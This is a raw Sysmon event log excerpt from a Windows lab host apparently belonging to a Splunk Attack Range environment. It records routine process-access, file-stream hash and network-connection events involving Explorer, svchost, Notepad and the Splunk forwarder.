10341000x800000000000000011172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.735{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.516{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=884B8377D224264322CA77D8955B831D,SHA256=9C2C8BE34FF1AAA97BC54DC8C75613C05C640D3BCC45C24079C3AE64E91013F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.094{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7BEF1CF0C24412ECA7F34FF0ACF920B,SHA256=C08769F480FFE82EE0794CEC16B834E69B79C7047D9BED456F386D5A90C2E68F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combas
e.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 354300x800000000000000011210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.553{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53718-false10.0.1.12-8000- 23542300x800000000000000011209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:59.860{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AF4D1D5643D87066AC7CFDACDAEB8EC,SHA256=AA0C43BBED5843FE58019D18D6E4E9EA2686F40EC6DE896009851E109785CABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:00.875{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26CEE4CB5FF5F7F8CD5B6E40A34A9605,SHA256=D836965325B4E1E0C9FBCBE8E463C1399617D62599C17F15C8E6712589AB6B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.984{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BEEFB3466E9C8844112D85465ED21A2,SHA256=164A40701B90317D258E2578654F1ECB340F42430AC07874F04B797D127390A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 